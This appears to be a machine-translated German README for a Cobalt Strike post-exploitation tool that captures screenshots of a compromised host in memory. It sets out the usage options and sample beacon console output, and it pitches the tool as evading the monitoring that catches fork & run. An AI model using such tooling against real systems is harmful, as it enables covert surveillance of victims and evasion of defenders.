
Eine alternative Screenshot-Funktion für Cobalt Strike, die WinAPI verwendet und keinen Fork & Run durchführt. Screenshot wird im Speicher heruntergeladen.
Eine alternative Screenshot-Funktionalität für Cobalt Strike, die WinAPI verwendet und kein fork & run durchführt. Screenshot wird im Speicher heruntergeladen.
make ausführen0: Vollbild erfassen (PID=0) spezifische PID: erfasse spezifische PID (funktioniert auch bei minimierten Fenstern!)
screenshot_bof ohne Argumente öffnet einen GUI-Dialogbeacon> screenshot_bof file.jpg 2 21964 0 90 100
[*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 12421 bytes
[+] received output:
Downloading JPEG over beacon as a screenshot with filename file.jpg
[*] received screenshot of Screenshot from Admin (26kb)
[+] received output:
Screenshot saved/downloaded successfully
Cobalt Strike verwendet eine Technik namens fork & run für viele seiner Post-Exploitation-Funktionen, einschließlich des Screenshot-Befehls. Während dieses Verhalten Stabilität bietet, ist es mittlerweile bekannt und wird stark überwacht. Dieses BOF soll eine OPSEC-sicherere Version der Screenshot-Funktionalität bieten.
Üblicher Haftungsausschluss hier, ich bin nicht verantwortlich für etwaige Verbrechen gegen die Menschlichkeit oder einen Atomkrieg, den Sie durch die Verwendung dieses schlecht geschriebenen Codes verursachen könnten.